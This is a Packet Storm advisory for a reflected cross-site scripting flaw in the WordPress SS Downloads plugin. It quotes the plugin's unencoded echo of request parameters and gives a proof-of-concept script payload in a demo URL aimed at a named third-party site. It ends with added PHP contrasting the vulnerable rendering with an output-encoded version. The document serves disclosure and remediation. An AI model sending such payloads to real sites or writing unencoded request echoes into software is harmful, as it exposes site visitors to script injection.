WordPress SS Downloads Cross Site Scripting

2014-01-26T00:00:00
ID PACKETSTORM:124958
Type packetstorm
Reporter ACC3SS
Modified 2014-01-26T00:00:00

Description

`######################  
# Exploit Title : WordPress SS Downloads Plugin Cross Site Scripting  
  
# Exploit Author : ACC3SS  
  
# Vendor Homepage : http://wordpress.org/plugins/ss-downloads/developers/  
  
# Software Link :  
http://downloads.wordpress.org/plugin/ss-downloads.1.4.4.1.zip  
  
# Date : 2014-01-19  
  
# Tested on : Windows 7 / Mozilla Firefox Web Browser  
  
# Discovered by : ACC3SS  
  
######################  
  
# Vulnerable code : emailform.php (each request parameter is assigned, then echoed as-is)  
  
$file = $_REQUEST['file'];      then  <?php echo $file; ?>  
$title = $_REQUEST['title'];    then  <?php echo $title; ?>  
$postid = $_REQUEST['postid'];  then  <?php echo $postid; ?>  
  
######################  
  
# Location :  
localhost/wp-content/plugins/ss-downloads/templates/emailform.php?file=[Xss]  
  
######################  
# Demo :  
  
#  
http://aquarts.de/wp-content/plugins/ss-downloads/templates/emailform.php?file=  
"/><script>alert(1);</script>  
######################  
`
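
The pattern the advisory points at in emailform.php, shown beside an output-encoded version. This is an added example, not the plugin's code or the reporter's: the surrounding HTML and the helper names (`param`, `h`, `render_vulnerable`, `render_hardened`) are assumptions, and only the three parameter names and the proof-of-concept string come from the advisory.

```php
<?php
// Added example, not the plugin's code. The HTML is an assumed stand-in for
// emailform.php; only the three parameter names come from the advisory.

// Read one request value as a string; array input (file[]=x) becomes ''.
function param(array $req, string $key): string
{
    return is_string($req[$key] ?? null) ? $req[$key] : '';
}

// Pattern the advisory reports: request values echoed with no encoding.
function render_vulnerable(array $req): string
{
    $file   = param($req, 'file');
    $title  = param($req, 'title');
    $postid = param($req, 'postid');
    return '<input type="hidden" name="file" value="' . $file . '" />' . "\n"
         . '<h3>' . $title . '</h3>' . "\n"
         . '<input type="hidden" name="postid" value="' . $postid . '" />';
}

// Encode for HTML text and quoted-attribute contexts. ENT_QUOTES covers both
// quote styles, so a value cannot close the attribute it is written into.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened form: encode at output time and force postid to an integer.
function render_hardened(array $req): string
{
    $postid = (int) param($req, 'postid');
    return '<input type="hidden" name="file" value="' . h(param($req, 'file')) . '" />' . "\n"
         . '<h3>' . h(param($req, 'title')) . '</h3>' . "\n"
         . '<input type="hidden" name="postid" value="' . $postid . '" />';
}

// Constructed request; the file value is the advisory's proof-of-concept string.
$req = [
    'file'   => '"/><script>alert(1);</script>',
    'title'  => 'Report <b>Q1</b>',
    'postid' => '12abc',
];

echo "--- vulnerable ---\n", render_vulnerable($req), "\n";
echo "--- hardened ---\n", render_hardened($req), "\n";
```

When the template runs with WordPress loaded, `esc_attr()`, `esc_html()` and `absint()` are the equivalent core helpers for these three contexts.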